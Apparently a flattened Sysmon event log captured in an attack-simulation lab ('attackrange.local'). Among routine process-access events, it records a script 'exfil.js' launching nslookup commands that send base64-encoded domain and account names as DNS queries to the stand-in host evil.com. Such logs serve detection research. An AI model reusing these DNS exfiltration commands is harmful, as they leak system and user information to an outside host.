14:21:47.404{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FB-629A-CB45-000000005F02}5392C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214256Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.404{2E1864BB-18FB-629A-CB45-000000005F02}53927432C:\Windows\system32\conhost.exe{2E1864BB-18FB-629A-CA45-000000005F02}6124C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214255Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.381{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-CB45-000000005F02}5392C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214254Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.365{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-CA45-000000005F02}6124C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214253Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.365{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214252Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.365{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214251Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.365{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214250Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.365{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214249Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.365{2E1864BB-18E0-629A-6742-000000005F02}39768016C:\Windows\System32\WScript.exe{2E1864BB-18FB-629A-CA45-000000005F02}6124C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214248Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.378{2E1864BB-18FB-629A-CA45-000000005F02}6124C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqnqjne.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214247Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.365{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlkzopbt.tmpMD5=0E5FCD35CD053EF552028604630DF807,SHA256=10CB74BA0B52EDCD250F65D3C712B6E8DE326D18DDB63A8E97ADD31848C9E0E2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214246Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.350{2E1864BB-18FB-629A-C845-000000005F02}29287512C:\Windows\system32\conhost.exe{2E1864BB-18FB-629A-C945-000000005F02}7608C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214245Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.334{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-C945-000000005F02}7608C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214244Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.334{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214243Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.334{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214242Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.334{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214241Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.334{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214240Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.334{2E1864BB-18FB-629A-C745-000000005F02}18007192C:\Windows\system32\cmd.exe{2E1864BB-18FB-629A-C945-000000005F02}7608C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214239Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.346{2E1864BB-18FB-629A-C945-000000005F02}7608C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FB-629A-C745-000000005F02}1800C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkzopbt.tmp 2>&1 10341000x8000000000000000214238Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.319{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FB-629A-C845-000000005F02}2928C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214237Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.319{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FB-629A-C845-000000005F02}2928C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214236Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.303{2E1864BB-18FB-629A-C845-000000005F02}29287512C:\Windows\system32\conhost.exe{2E1864BB-18FB-629A-C745-000000005F02}1800C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214235Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.298{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-C845-000000005F02}2928C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214234Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.281{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214233Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.281{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214232Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.281{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-C745-000000005F02}1800C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214231Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.281{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214230Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.281{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214229Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.281{2E1864BB-18E0-629A-6742-000000005F02}39762620C:\Windows\System32\WScript.exe{2E1864BB-18FB-629A-C745-000000005F02}1800C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214228Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.283{2E1864BB-18FB-629A-C745-000000005F02}1800C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkzopbt.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214227Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.267{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlpqh.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214226Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.753{00000000-0000-0000-0000-000000000000}7080<unknown process>-udpfalsefalse127.0.0.1-51177-false127.0.0.1-53domain 354300x8000000000000000214225Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.753{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51177- 354300x8000000000000000214224Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.753{00000000-0000-0000-0000-000000000000}7080<unknown process>-udptruefalse127.0.0.1-51177-false127.0.0.1-53domain 10341000x8000000000000000214223Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 